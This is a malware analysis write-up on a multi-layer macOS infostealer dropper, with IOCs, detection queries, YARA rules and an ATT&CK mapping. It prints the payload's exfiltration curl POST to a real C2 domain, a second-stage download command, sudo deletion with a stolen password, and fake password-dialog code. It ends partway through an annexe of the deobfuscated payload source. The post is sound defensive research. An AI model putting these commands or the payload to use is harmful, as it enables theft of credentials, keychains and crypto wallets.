2026-04-07macOSinfostealerAppleScriptcrypto-stealerreverse-engineering
Tearing Apart a Multi-Layer macOS Infostealer Dropper
Full static analysis of a macOS ARM64 infostealer dropper that uses custom encoding, NEON multiply chains, and runtime key derivation to decrypt a 114KB AppleScript payload targeting browser credentials, Keychain, crypto wallets, Apple Notes, and more.
Executive Summary
The sample is a macOS Mach-O Universal binary (x86_64 + ARM64) that serves as a multi-layer encrypted dropper for a 114KB obfuscated AppleScript infostealer. The binary employs six distinct encryption layers -- including a custom hex encoding alphabet, ARM NEON multiply-accumulate chains, runtime key derivation from an environment check, and a hash-table-based substitution cipher -- to resist static analysis.
Once decrypted, the AppleScript payload steals browser credentials and cookies from all major browsers, targets ~280 cryptocurrency wallet extensions by ID, exfiltrates the macOS Keychain, harvests Apple Notes, social-engineers the user's macOS password via a fake dialog, stages everything under /tmp/, and uploads to a C2 server at mpasvw[.]com / 92.246.136[.]14. It installs persistence via a LaunchDaemon masquerading as com.apple.accountsd.helper.
Analysis was conducted statically using Ghidra for disassembly and Unicorn Engine for emulating the decryption routines.
Quick-Reference IOCs
If you see any of the following on a macOS endpoint, assume compromise and isolate immediately:
| IOC | Type | What It Means |
|---|---|---|
92.246.136[.]14 | IP | C2 server - active exfiltration endpoint. If you see outbound HTTP POST traffic to this IP, stolen data is being uploaded. |
mpasvw[.]com | Domain | Primary exfiltration domain. HTTPS POST with custom headers (BuildID, user, cl). Block and sinkhole. |
aforvm[.]com | Domain | C2 domain for second-stage binary download (https://aforvm[.]com/zxc/kito). Used by the persistence installer to fetch the backdoor binary. Not used for data exfiltration. |
com.apple.accountsd.helper | LaunchDaemon | Persistence mechanism masquerading as Apple's accountsd. Real Apple daemons don't use this label. Presence indicates a backdoor is installed and will survive reboot. |
~/Library/Application Support/.com.apple.accountsd/ | Directory | Bot installation directory. Contains .auth (stolen password), .cfg (config), .service (bot binary). Hidden directory using Apple naming convention. |
/tmp/<5-digit-random>/ | Directory | Active staging directory. Contains FileGrabber/ subdirectory with stolen browser data, SSH keys, crypto wallets, Notes. pwd file contains the user's macOS password in plaintext. |
/tmp/out.zip | File | Archived stolen data ready for exfiltration. If this exists, data theft is complete and upload is imminent or in progress. |
osascript with >100KB -e argument | Process | The infostealer payload being executed. Normal osascript invocations use short scripts or file paths, not 114KB inline arguments. |
dscl . authonly invoked by osascript | Process | Password validation — the malware is testing a stolen or social-engineered password against the local account. |
curl -X POST with -H "BuildID:" | Process | Data exfiltration in progress. The custom header is unique to this malware family. |
pkill Terminal | Process | Post-execution cleanup. The malware kills Terminal to hide evidence. If this appears without user action, the payload has already run to completion. |
Binary Metadata
| Property | Value |
|---|---|
| SHA256 | 13185b0ed3b5032ed4c92f73ea100188af73d46e84a0a2b84055e2f2d3e3b6af |
| Format | Mach-O Universal (x86_64 + ARM64) |
| Total Size | 11,497,832 bytes (11 MB) |
| ARM64 Slice | 5,652,488 bytes |
| Code Section | 1.1 MB (__text) |
| Encrypted Data | 4.3 MB (__const) |
| Functions | 59 (21 user-defined) |
| Compiler | Clang/LLVM (C++ with libc++) |
| Imports | fork, pipe, dup2, execl, execvp, write, waitpid, bzero |
The binary's import table immediately reveals its intent: pipe-based process execution with memory wiping.
Dropper Architecture
Function Map
All 21 user-defined functions were identified and renamed in Ghidra:
| Address | Name | Role |
|---|---|---|
0x100111fc4 | entry | Entry point |
0x100111fd8 | main_orchestrator | Decryption + execution pipeline |
0x100000d70 | byte_vector_insert | Build encrypted byte arrays from __const |
0x100000f94 | int_vector_insert | Build encryption key integer arrays |
0x1000011e0 | alloc_zeroed_string | Allocate zeroed std::string buffer |
0x10000126c | exec_shell_command | fork/pipe/execvp /bin/sh -s |
0x100001984 | custom_hex_decode | Hex decode with custom 16-char alphabet |
0x1000013e4 | substitution_cipher | Hash-table position-based substitution |
0x10005a388 | generate_initial_payload | Initial command generator (~360 KB code) |
0x100044be0 | generate_payload_fragment1 | Shell script fragment 1 (~90 KB code) |
0x10005ce58 | generate_payload_fragment2 | Shell script fragment 2 (~370 KB code) |
0x100025c74 | generate_payload_fragment3 | Shell script fragment 3 (~125 KB code) |
0x1000c8554 | generate_payload_fragment4 | Shell script fragment 4 (~290 KB code) |
0x100001a84 | generate_payload_fragment5 | Shell script fragment 5 |
Six additional functions (check_string_integrity, compute_custom_hash, copy_string_bytewise, and three decryption variants) are compiled into the binary but never called -- likely dead code from a shared library or deliberate decoys.
Custom Hex Encoding
The binary uses a non-standard 16-character alphabet for hex encoding, stored as a 256-byte lookup table at 0x100113490:
| Nibble | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | A | B | C | D | E | F |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Char | C | Z | m | B | J | f | x | M | E | e | r | v | u | A | F | I |
This defeats pattern matching for standard hex-encoded strings and evades YARA rules targeting conventional encoding.
Decryption Pipeline (6 Phases)
Phase 1: Key Material Construction
The main_orchestrator loads hardcoded constants from the __const section into three arrays:
- Byte array (128 bytes): Built via 2 calls to
byte_vector_insert - Int array 1 (128 x 32-bit): Built via 3 calls to
int_vector_insert - Int array 2 (128 x 32-bit): Built via 2 calls to
int_vector_insert
These feed into an ARM NEON multiply-accumulate chain: for each position, the integer key is raised to the 32nd power modulo 2^32 across four parallel accumulators, then the results are cross-multiplied using NEON ext (element extract) to produce a single transformation byte.
The output is a 128-byte substitution cipher key consisting entirely of the 16 custom hex alphabet characters.
Phase 2: Initial Command Decryption + Execution
generate_initial_payload()-- a massive function (10,959 bytes of code) making ~122 calls tobyte_vector_insertand ~110 toint_vector_insert-- assembles encrypted data from__constand applies an arithmetic transformation:
output[i] = ((mid - lo) - (hi ^ ciphertext[i])) ^ lo
where: lo = val & 0xFF, mid = (val>>8) & 0xFF, hi = (val>>16) & 0xFF
(each clamped to 1 if zero)
custom_hex_decode()converts the result from the custom alphabet to raw bytessubstitution_cipher()transforms using the Phase 1 keyexec_shell_command()executes the result viafork/pipe/execvp/bin/sh -s
The initial command (2,906 bytes) is an obfuscated AppleScript executed via osascript -e that performs an environment check. Its exit code seeds all subsequent decryption.
Phase 3: XOR Key Derivation
The waitpid() return status from Phase 2 determines the master XOR key:
if (status & 0x7F) != 0: // killed by signal
key = 0x67 // fallback
else: // normal exit
exit_code = (status >> 8) & 0xFFFFFF
key = ((exit_code * 0xBDE) + 0x5AF) & 0xFF
For the expected exit code of 0: key = 0xAF. An incorrect exit code (sandbox, wrong OS version) produces the wrong key, rendering all subsequent decryption into garbage.
Phase 4: Fragment Decryption
Five payload generator functions -- each 90-370 KB of code containing hundreds of inlined constant loads -- produce hex-encoded data. Each generator has a unique arithmetic transformation (confirmed via ARM64 instruction analysis of their transformation tails):
| Fragment | Generator | XOR Key Variant | Verified |
|---|---|---|---|
| 1 | generate_payload_fragment1 | key (0xAF) | EOR + ORR chain |
| 2 | generate_payload_fragment2 | key + 0x43 (0xF2) | Multi-int-array |
| 3 | generate_payload_fragment3 | key + 0x86 (0x35) | EOR + ORR chain |
| 4 | generate_payload_fragment4 | key - 0x37 (0x78) | MADD + ORR + EOR |
| 5 | generate_payload_fragment5 | key + 0x0C (0xBB) | ORR + EOR + UBFM |
After hex-decode and XOR, each fragment produces valid custom hex characters -- confirming the XOR key 0xAF was identified correctly (100.0% valid across all 304,576 bytes).
Phase 5: Reassembly + Substitution Cipher
- All five XOR'd fragments are hex-decoded again (custom alphabet -> binary)
- An additional 60-byte segment is decoded from an arithmetic tuple table at
0x10054c320 substitution_cipher()is applied using the Phase 1 key to produce the final plaintext
Phase 6: Pipe to Bash with Anti-Forensics
The decrypted script is piped to /bin/bash with a critical anti-forensics technique:
for each chunk (64-191 bytes):
XOR decrypt the chunk (with key 0xAF)
write(pipe_fd, chunk, chunk_size)
bzero(chunk, chunk_size) // wipe immediately
Between each write, the data is re-encrypted then selectively decrypted per chunk. At any point during execution, at most ~191 bytes of plaintext exist in memory.
A second exec_shell_command runs disown; pkill Terminal to hide the execution window.
Extraction via Emulation
The six payload generator functions are 90-370 KB each, containing hundreds of inlined constant loads. Five of six exceeded Ghidra's decompiler timeout and instruction limits. Rather than attempting manual ARM64 instruction tracing across ~1MB of transformation code, the payload was extracted by emulating the binary's own decryption routines using Unicorn Engine -- an ARM64 CPU emulator.
Why Emulation
The dropper's encryption is deeply layered: each generator has a unique arithmetic transformation, the substitution cipher uses a complex hash-table with position-dependent output, and the XOR key is derived at runtime. Reversing each layer independently proved impractical -- small errors in any layer cascade into garbage output. Emulating the binary's own code guarantees correct decryption without needing to understand every intermediate step.
Emulation Architecture
The approach used three emulation stages:
Stage 1 -- Generator Functions: Each of the six generator functions was emulated individually. The functions are pure data transformations: they load constants from the __const section, apply arithmetic, and return a std::string. External dependencies (operator_new, memcpy, memmove, bzero) were hooked with Python implementations operating within Unicorn's sandboxed memory. All six produced 100% valid custom hex output (~122 KB each), confirming correct emulation.
Stage 2 -- XOR Key Identification: With all generator outputs in hand, the XOR base key was identified by brute-forcing all 256 candidates. For each candidate, every byte of every fragment was XOR'd with its key variant, and the result was validated against the custom hex alphabet. Key 0xAF (corresponding to exit code 0) produced 100.0% valid hex across all 304,576 bytes. The next-best candidate scored 41%.
Stage 3 -- Full Pipeline: The main_orchestrator function was emulated end-to-end with:
- Generator calls intercepted and returning pre-computed outputs from Stage 1
exec_shell_commandreturning waitpid status 0 (exit code 0, matching the key from Stage 2)- All syscall stubs (
fork,pipe,execl,execvp,write,dup2,close,waitpid,__exit) hard-blocked to prevent any process or I/O operations
The emulation ran ~24 million instructions across the orchestrator's decryption pipeline -- NEON multiply chain, XOR layers, hex decode, substitution cipher, fragment concatenation -- and stopped at the _pipe syscall stub. At that point, the fully decrypted 114,216-byte payload was read directly from the emulated stack and XOR-decrypted with key 0xAF.
Payload Analysis: AppleScript Infostealer
The decrypted payload is a 114,216-byte (1,339-line) obfuscated AppleScript executed via osascript -e '...'. All operational strings are constructed at runtime via three arithmetic obfuscation functions that use character-code math on integer arrays.
String Obfuscation Functions
-- Subtraction: chr(a[i] - b[i])
on xhbgcyydmaj(a, b) ...
-- Addition: chr(a[i] + b[i])
on okkqzcmkurrg(a, b) ...
-- Subtraction with constant: chr(a[i] - c - b[i])
on llwlidonf(a, b, c) ...
Over 480 strings are constructed this way (variables hwyksoup0 through hwyksoup479), making the script completely opaque to static string scanning.
Stealing Capabilities
1. Browser Credentials & Cookies
Targets all major Chromium + Firefox browsers:
- Google Chrome, Brave, Microsoft Edge, Opera/Opera GX, Vivaldi, Arc, Firefox, Safari
- Steals: Login Data, Cookies, Web Data, History, Local State, Bookmarks, Form Values
- Iterates all browser profiles
- Uses
cp -fto copy database files to staging
2. Cryptocurrency Wallet Extensions (~280 IDs)
The gaifltxslt property contains ~280 browser extension IDs targeting:
- MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Exodus, Atomic Wallet
- Keplr, Terra Station, Solflare, Brave Wallet
- Many other DeFi, NFT, and crypto wallet extensions
- Password manager extensions
When a targeted extension is found (mutwyxdwgkws checks directory listing), its entire storage is recursively copied.
3. macOS Keychain
- Determines Keychain UUID directory via shell command
- Copies entire
~/Library/Keychains/<UUID>/directory (containslogin.keychain-db)
4. Apple Notes
- Accesses Notes app via AppleScript (
tell application "Notes") - Extracts creation date + body of every note across all accounts
- Copies NoteStore SQLite databases and media attachments (30MB cap)
5. Safari Data
~/Library/Cookies/Cookies.binarycookies~/Library/Containers/com.apple.Safari/Data/Library/Cookies/~/Library/Safari/Form Values(autofill data)
6. Desktop & Documents Files
- Scans Desktop and Documents folders
- Steals files matching target extensions (likely
.txt,.pdf,.key,.pem,.wallet,.kdbx,.json,.env) - 30MB total size cap
7. SSH Keys & Cloud Credentials
Decoded strings reveal theft of developer/DevOps secrets:
- SSH: Copies entire
~/.ssh/directory toFileGrabber/ssh/ - AWS:
~/.aws/credentialsand~/.aws/config - Google Cloud:
~/.config/gcloud/application_default_credentials.jsonandcredentials.db - Azure: Entire
~/.azure/directory - Docker:
~/.docker/config.json - FileZilla:
sitemanager.xmlandrecentservers.xml(FTP credentials)
8. Desktop Cryptocurrency Wallet Theft
Targets native wallet applications by directly copying wallet files:
- Electrum:
~/.electrum/wallets/ - Electrum-LTC:
~/.electrum-ltc/wallets/ - Electron Cash:
~/.electron-cash/wallets/ - Coinomi:
Coinomi/wallets/ - Exodus:
Exodus/(full app data) - Atomic Wallet:
atomic/Local Storage/leveldb/ - Wasabi Wallet:
~/.walletwasabi/client/Wallets/ - Ledger Live:
Ledger Live/storage - Monero:
Monero/wallets/ - Bitcoin Core:
Bitcoin/wallets/ - Litecoin Core:
Litecoin/wallets/ - Dash Core:
DashCore/wallets/ - Dogecoin Core:
Dogecoin/wallets/ - Trezor Suite:
@trezor/suite-desktop/ - Sparrow:
~/.sparrow/wallets/ - Guarda:
Guarda/ - Binance:
Binance/app-store.json - TonKeeper:
@tonkeeper/desktop/config.json
9. Trojanized Desktop App Replacement
Three functions (webipcfdo, kewfxqic, nwjzgtalvo) target Ledger Wallet, Trezor Suite, and Exodus desktop apps:
- Downloads a trojanized replacement from the C2 (
/zxc/app.zip,/zxc/apptwo.zip,/zxc/appex.zip) - Uses the stolen sudo password:
echo <password> | sudo -S rm -r /Applications/Ledger Wallet.app - Extracts the trojanized app via
ditto -x -kto/Applications/ - Sets permissions:
chmod -R +x - Tracks replacement via a
.loggedmarker file
10. Messaging & Other Data
- Telegram:
Telegram Desktop/tdata/(session keys:key_datas,maps) - Discord:
Local Storage/leveldb/(tokens) - Apple Stickies:
Containers/Stickies/Data/Library/Stickies/ - Shell History:
~/.zsh_history - OpenVPN:
OpenVPN Connect/profiles/
11. Password Social Engineering
-- First tries empty password via dscl
dscl . authonly <username> <password>
-- If fails, shows fake system dialog:
display dialog <prompt> default answer "" with icon caution
buttons {"OK"} default button "OK" with hidden answer with title "macOS"
- Displays a convincing macOS-styled password prompt
- Loops until the user enters a valid password (validated via
dscl . authonly) - Stores in
<bot_dir>/.authfor persistence across runs
12. Malicious Browser Extension Injection
Three separate functions target Chrome, Brave, and Firefox:
- Create temporary browser profiles
- Install a malicious extension
- Launch the browser with the compromised profile
- The extension likely performs in-browser credential/cookie extraction
Persistence
Installs a LaunchDaemon masquerading as an Apple service:
| Component | Value |
|---|---|
| Label | com.apple.accountsd.helper |
| Plist Path | /Library/LaunchDaemons/com.apple.accountsd.helper.plist |
| Binary | ~/Library/Application Support/<dir>/<bot_binary> |
| Properties | RunAtLoad, KeepAlive |
The second-stage binary is downloaded from the C2 via curl -o <path> https://<c2>/zxc/kito.
Data Staging & Exfiltration
Staging:
- Creates
/tmp/<random_5_digit>/directory - Organizes stolen data into subdirectories (
FileGrabber/, browser-specific dirs) - Archives with
zipordittoto/tmp/out.zip
Exfiltration:
curl --connect-timeout 120 --max-time 300 -X POST \
-H "user: <macOS_username>" \
-H "cl: <client_id>" \
-H "BuildID: 0"
-H "cl: 1OVqyOU/n3-4zKVSjFsNK88S2buJzuW3rNaXRCJ1l4Q=" \
-H "cn: <chunk_number>" \
-F "file=@/tmp/out.zip" \
https://mpasvw[.]com/<path>
- Files >25MB are split and uploaded in numbered chunks
- 3 retry attempts with 10-15 second delays
- Falls back to
http://92.246.136[.]14/contactif primary fails
Cleanup
disown; pkill Terminal
Kills the Terminal window to hide evidence of execution.
Indicators of Compromise
Network IOCs
| Type | Value | Description |
|---|---|---|
| C2 Domain | mpasvw[.]com | Primary exfiltration endpoint |
| C2 Domain | aforvm[.]com | Build ID / bot identifier |
| C2 IP | 92.246.136[.]14 | Fallback C2 (plain HTTP) |
| URL Path | /contact | Upload endpoint |
| URL Path | /zxc/kito | Second-stage binary download |
File IOCs
| Type | Value | Description |
|---|---|---|
| SHA256 | 13185b0ed3b5032ed4c92f73ea100188af73d46e84a0a2b84055e2f2d3e3b6af | Dropper binary |
| File | com.apple.accountsd.helper.plist | Persistence plist |
| File | .auth in Application Support | Stolen macOS password |
| File | .cfg in Application Support | Bot configuration |
| File | .service in Application Support | Bot binary |
| File | /tmp/out.zip | Archived stolen data |
| File | /tmp/<5_digits>/pwd | Password staged for exfil |
| File | /tmp/<5_digits>/FileGrabber/ | Stolen files staging |
Behavioral IOCs
| Indicator | Description |
|---|---|
osascript -e with >100KB argument | AppleScript payload execution |
osascript reading Cookies.binarycookies | Cookie theft |
osascript accessing ~/Library/Keychains/ | Keychain theft |
osascript using display dialog + hidden answer | Password phishing |
osascript running dscl . authonly | Password validation |
curl -X POST with -H "BuildID:" header | Data exfiltration |
pkill Terminal | Post-execution cleanup |
Mach-O binary piping data to /bin/bash via fork/pipe | Dropper execution pattern |
CrowdStrike Falcon Queries
-- Dropper execution pattern: binary piping to bash
event_simpleName=ProcessRollup2 AND FileName="bash" AND ParentBaseFileName NOT IN ("Terminal", "iTerm2", "zsh", "login")
-- AppleScript stealer execution
event_simpleName=ProcessRollup2 AND FileName="osascript" AND CommandLine CONTAINS "-e" AND CommandHistory_bytes > 50000
-- Password dialog social engineering
event_simpleName=ProcessRollup2 AND FileName="osascript" AND CommandLine CONTAINS "hidden answer"
-- Keychain access by osascript
event_simpleName=FileOpenInfo AND FileName="login.keychain-db" AND ContextProcessId_decimal IN (SELECT ProcessId FROM ProcessRollup2 WHERE FileName="osascript")
-- Cookie theft
event_simpleName=FileOpenInfo AND FileName="Cookies.binarycookies" AND ContextProcessId_decimal IN (SELECT ProcessId FROM ProcessRollup2 WHERE FileName="osascript")
-- LaunchDaemon persistence (masquerading as Apple)
event_simpleName=FileWriteInfo AND FilePath CONTAINS "LaunchDaemons" AND FileName="com.apple.accountsd.helper.plist"
-- Bot binary install
event_simpleName=FileWriteInfo AND FilePath CONTAINS "Application Support" AND FileName=".service"
-- Password file creation
event_simpleName=FileWriteInfo AND FileName=".auth" AND FilePath CONTAINS "Application Support"
-- C2 communication
event_simpleName=DnsRequest AND DomainName IN ("mpasvw.com", "aforvm.com")
event_simpleName=NetworkConnection AND RemoteIP="92.246.136.14"
-- Data exfiltration via curl
event_simpleName=ProcessRollup2 AND FileName="curl" AND CommandLine CONTAINS "BuildID"
-- Post-execution cleanup
event_simpleName=ProcessRollup2 AND FileName="pkill" AND CommandLine CONTAINS "Terminal"
YARA Rules
rule MacOS_Infostealer_Dropper {
meta:
description = "Detects macOS infostealer dropper with custom hex encoding"
author = "Malware Analysis"
severity = "Critical"
hash = "13185b0ed3b5032ed4c92f73ea100188af73d46e84a0a2b84055e2f2d3e3b6af"
strings:
$hex_table = { FF 0D 03 00 FF 08 0E FF FF 0F 04 FF FF 07 }
$bin_sh = "/bin/sh" ascii
$bin_bash = "/bin/bas" ascii
$import_fork = "_fork" ascii
$import_pipe = "_pipe" ascii
$import_dup2 = "_dup2" ascii
$import_execl = "_execl" ascii
$import_write = "_write" ascii
condition:
uint32(0) == 0xBEBAFECA and // FAT Mach-O
$hex_table and $bin_sh and $bin_bash and
3 of ($import_*)
}
rule MacOS_Infostealer_AppleScript_Payload {
meta:
description = "Detects obfuscated AppleScript infostealer payload pattern"
strings:
$obf1 = "character id ((item" ascii
$obf2 = "mod 9999" ascii
$obf3 = /set hwyksoup\d+ to/ ascii
$cookie = "Cookies.binarycookies" ascii
$notes = "NoteStore.sqlite" ascii
$pkill = "pkill Terminal" ascii
$dialog = "hidden answer" ascii
$dscl = "dscl . authonly" ascii
condition:
4 of them
}
MITRE ATT&CK Mapping
| Technique | ID | Usage |
|---|---|---|
| AppleScript Execution | T1059.002 | Payload delivered via osascript -e |
| Native API | T1106 | fork/pipe/execl for process creation |
| Obfuscated Files or Information | T1027 | 6-layer encryption in dropper + arithmetic string obfuscation in payload |
| Deobfuscate/Decode Files | T1140 | Runtime string construction from integer arrays |
| Credentials from Password Stores: Keychain | T1555.001 | Keychain directory theft |
| Credentials from Password Stores: Browsers | T1555.003 | Chrome/Brave/Edge/Opera/Firefox/Safari credential theft |
| Steal Web Session Cookie | T1539 | Cookies.binarycookies + browser cookie DB theft |
| GUI Input Capture | T1056.002 | Fake macOS password dialog |
| Data from Local System | T1005 | Desktop/Documents file theft by extension |
| Data from Information Repositories | T1213 | Apple Notes extraction |
| Create or Modify System Process: LaunchDaemon | T1543.004 | com.apple.accountsd.helper persistence |
| Masquerading: Match Legitimate Name | T1036.005 | LaunchDaemon mimics Apple's accountsd |
| Archive Collected Data | T1560.001 | zip/ditto staging to /tmp/out.zip |
| Exfiltration Over C2 Channel | T1041 | curl POST to mpasvw[.]com |
| Application Layer Protocol: HTTP | T1071.001 | HTTP POST with custom headers |
| Ingress Tool Transfer | T1105 | Second-stage binary download via curl |
| Indicator Removal: File Deletion | T1070.004 | bzero memory wiping + pkill Terminal |
| Virtualization/Sandbox Evasion | T1497 | Initial check command gates decryption |
Conclusion
This sample represents a well-engineered macOS infostealer dropper with significant investment in anti-analysis:
- Six encryption layers protect the payload from static extraction
- Runtime key derivation from an environment check binds decryption to the target system
- Per-generator unique transformations prevent pattern-based decryption
- Chunked write with memory wiping defeats runtime memory forensics
- 480+ obfuscated strings in the AppleScript payload prevent string-based detection
The payload itself is comprehensive, targeting virtually every valuable data source on macOS: browser credentials, cookies, crypto wallets (~280 extension IDs), Keychain, Apple Notes, documents, and the user's macOS password. The C2 infrastructure uses both a domain (mpasvw[.]com) and a fallback IP (92.246.136[.]14), with the LaunchDaemon persistence masquerading as Apple's accountsd service.
The combination of a compiled ARM64 dropper with an AppleScript payload is notable -- it combines the evasion benefits of native code encryption with the flexibility of AppleScript's access to macOS APIs (Finder, Notes, browser profiles) without requiring entitlements or TCC bypasses for many data sources.
Annexe A: Deobfuscated Infostealer Payload
The full 114KB AppleScript payload with all 530 obfuscated strings decoded inline and all function/variable names replaced with descriptive equivalents.
Click to expand full deobfuscated payload (1,363 lines)
osascript -e '
property targetExtensionIds : {"abamjefkidngfegdjbmffdmbgjgpaobf", "abjfbanhppgiflmobebfffbijcfoeiao", "abkahkcbhngaebpcgfmhkoioedceoigp", "abogmiocnneedmmepnohnhlijcjpcifd", "acmacodkjbdgmoleebolmdjonilkdbch", "admmjipmmciaobhojoghlmleefbicajg", "aeachknmefphepccionboohckonoeemg", "aeblfdkhhhdcdjpifhhbdiojplfjncoa", "afbcbjpbpfadlkmhmclhkeeodmamcflc", "aflkmfhebedbjioipglgcbcmnbpgliof", "agoakfejjabomempkjlepdflaleeobhb", "ahidmapichficbkfglbhgmhjcojjmlnm", "aholpfdialjgjfhomihkjbmgjidlcdno", "aiaghdjafpiofpainifbgfgjfpclngoh", "aiifbnbfobpmeekipheeijimdpnlpgpp", "aijcbedoijmgnlmjeegjaglmepbmpkpi", "ajkifnllfhikkjbjopkhmjoieikeihjb", "ajopcimklncnhjednieoejhkffdolemp", "akkmagafhjjjjclaejjomkeccmjhdkpa", "algblmhagnobbnmakepomicmfljlbehg", "amkmjjmmflddogmhpjloimipbofnfjih", "ammjlinfekkoockogfhdkgcohjlbhmff", "anokgmphncpekkhclmingpimjmcooifb", "apnehcjmnengpnmccpaibjmhhoadaico", "bcenedbpaaegpnijoadpdjiachahncdg", "bcopgchhojmggmffilplmbdicgaihlkp", "bdgmdoedahdcjmpmifafdhnffjinddgc", "bedogdpgdnifilpgeianmmdabklhfkcn", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "bfogiafebfohielmmehodmfbbebbbpei", "bgpipimickeadkjlklgciifhnalhdjhe", "bgjogpoidejdemgoochpnkmdjpocgkha", "bhghoamapcdpbohphigoooaddinpkbai", "bhhhlbepdkbapadjdnnojkbgioiodbic", "bifidjkcdpgfnlbcjpdkdcnbiooooblg", "bipdhagncpgaccgdbddmbpcabgjikfkn", "bkgplkpdgidlgmnlhdfakhcjfpfgjjkb", "bkklifkecemccedpkhcebagjpehhabfb", "bmabahhenimmnfijaiccmonalfhpcndh", "bmikpgodpkclnkgmnpphehdgcimmided", "bocpokimicclpaiekenaeelehdjllofo", "bofddndhbegljegmpmnlbhcejofmjgbn", "bopcbmipnjdcdfflfgjdgdjejmgpoaab", "caljgklbbfbcjjanaijlacgncafpegll", "cfbfdhimifdmdehjmkdobpcjfefblkjm", "cflgahhmjlmnjbikhakapcfkpbcmllam", "cgeeodpfagjceefieflmdfphplkenlfk", "chgfefjpcobfbnpmiokfjjaglahmnded", "cihmoadaighcejopammfbmddcmdekcje", "cjmkndjhnagcfbpiemnkdpomccnjblmj", "cjookpbkjnpkmknedggeecikaponcalb", "ckklhkaabbmdjkahiaaplikpdddkenic", "cmndjbecilbocjfkibfbifhngkdmjgog", "cmoakldedjfnjofgbbfenefcagmedlga", "cnlhokffphohmfcddnibpohmkdfafdli", "cnmamaachppnkjgnildpdmkaakejnhae", "cnncmdhjacpkmjmkcafchppbnpnhdmon", "copjnifcecdedocejpaapepagaodgpbh", "cphhlgmgameodnhkjdmkpanlelnlohao", "cpmkedoipcpimgecpmgpldfpohjplkpp", "dbgnhckhnppddckangcjbkjnlddbjkna", "dgiehkgfknklegdhekgeabnhgfjhbajd", "dkdedlpgdmmkkfjabffeganieamfklkm", "dlcobpjiigpikoobohmabehhmhfoodbb", "dldjpboieedgcmpkchcjcbijingjcgok", "dmkamcknogkgcdfhhbddcghachkejeap", "dngmlblcodfobpdpecaadgfbcggfjfnm", "dpcklmdombjcplafheapiblogdlgjjlb", "dphoaaiomekdhacmfoblfblmncpnbahm", "eamiofncoknfkefhlkdblngblpffehek", "eajafomhmkipbjmfmhebemolkcicgfmd", "ebfidpplhabeedpnhjnobghokpiioolj", "efbglgofoippbgcjepnhiblaibcnclgk", "egjidjbpglichdcondbcbdnbeeppgdph", "ehgjhhccekdedpbkifaojjaefeohnoea", "ehjiblpccbknkgimiflboggcffmpphhp", "eiaeiblijfjekdanodkjadfinkhbfgcd", "einnioafmpimabjcddiinlhmijaionap", "ejbidfepgijlcgahbmbckmnaljagjoll", "ejjladinnckdgjemekebdpeokbikhfci", "elalghlhoepcjfaedkcmjolahamlnjcp", "ellkdbaphhldpeajbepobaecooaoafpg", "emeeapjkbcbpbpgaagfchmcgglmebnen", "enabgbdfcbaehmbigakijjabdpdnimlg", "eokbbaidfgdndnljmffldfgjklpjkdoi", "eomhlheglneofffmbfjflldlbcnhpkpb", "epapihdplajcdnnkdeiahlgigofloibg", "fccgmnglbhajioalokbcidhcaikhlcpm", "fcckkdbjnoikooededlapcalpionmalo", "fcfcfllfndlomdhbehjjcoimbgofdncg", "fdchdcpieegfofnofhgdombfckhbcokj", "fdcnegogpncmfejlfnffnofpngdiejii", "fdjamakpfbbddfjaooikfcpapjohcfmg", "ffbceckpkpbcmgiaehlloocglmijnpmp", "ffnbelfdoeiohenkjibnmadjiehjhajb", "fghhpjoffbgecjikiipbkpdakfmkbmig", "fhbohimaelbohpjbbldcngcnapndodjp", "fhilaheimglignddkjgofkcbgekhenbh", "fiikommddbeccaoicoejoniammnalkfa", "fijngjgcjhjmmpcmkeiomlglpeiijkld", "fldfpgipfncgndfolcbkdeeknbbbnhcc", "flpiciilemghbmfalicajoolhkkenfel", "fmblappgoiilbgafhjklehhfifbdocee", "fmhmiaejopepamlcjkncpgpdjichnecm", "fnjhmkhhmkbjkkabndcnnogagogbneec", "fopmedgnkfpebgllppeddmmochcookhc", "fpibioaihcagphbidhodidjbnclocgll", "fpkhgmpbidmiogeglndfbkegfdlnajnf", "gadbifgblmedliakbceidegloehmffic", "gafhhkghbfjjkeiendhlofajokpaflmk", "gbjepgaebckfidagpfeioimheabiohmg", "gdokollfhmnbfckbobkdbakhilldkhcj", "ghlmndacnhlaekppcllcpcjjjomjkjpg", "ghmbeldphafepmbegfdlkpapadhbakde", "ginchbkmljhldofnbjabmeophlhdldgp", "gjagmgiddbbciopjhllkdnddhcglnemk", "gjkdbeaiifkpoencioahhcilildpjhgh", "gjlmehlldlphhljhpnlddaodbjjcchai", "gjnckgkfmgmibbkoficdidcljeaaaheg", "gkeelndblnomfmjnophbhfhcjbcnemka", "gkodhkbmiflnmkipcmlhhgadebbeijhh", "glmhbknppefdmpemdmjnjlinpbclokhn", "gpnihlnnodeiiaakbikldcihojploeca", "hbbgbephgojikajhfbomhlmmollphcad", "hcjhpkgbmechpabifbggldplacolbkoh", "hdkobeeifhdplocklknbnejdelgagbao", "hdokiejnpimakedhajhdlcegeplioahd", "heamnjbnflcikcggoiplibfommfbkjpj", "hgbeiipamcgbdjhfflifkgehomnmglgk", "hifafgmccdpekplomjjkcfgodnhcellj", "hmeobnfnfcmdkdcmlblgagmfpfboieaf", "hnfanknocfeofbddgcijnmhnfnkdnaad", "hnhobjmcibchnmglfbldbfabcgaknlkj", "hpbgcgmiemanfelegbndmhieiigkackl", "hpclkefagolihohboafpheddmmgdffjm", "ibljocddagjghmlpgihahamcghfggcjc", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "icblpoalghoakidcjiheabnkijnklhhe", "icpikagpkkbldbfjlbefnmmmcohbjije", "idnnbdplmphpflfnlkomgpfbpcgelopg", "idpdilbfamoopcfofbipefhmmnflljfi", "ieldiilncjhfkalnemgjbffmpomcaigi", "ifckdpamphokdglkkdomedpdegcjhjdp", "ifclboecfhkjbpmhgehodcjpciihhmif", "iglbgmakmggfkoidiagnhknlndljlolb", "igkpcodhieompeloncfnbekccinhapdb", "ilhaljfiglknggcoegeknjghdgampffk", "ilolmnhjbbggkmopnemiphomhaojndmb", "imlcamfeniaidioeflifonfjeeppblda", "inlkhilmjmjomfcpdifpfgllhhlpnbej", "iokeahhehimjnekafflcihljlcjccdbe", "jaooiolkmfcmloonphpiiogkfckgciom", "jbkgjmpfammbgejcpedggoefddacbdia", "jblndlipeogpafnldhgmapagcccfchpi", "jbppfhkifinbpinekbahmdomhlaidhfm", "jcacnejopjdphbnjgfaaobbfafkihpep", "jfdlamikmbghhapbgfoogdffldioobgl", 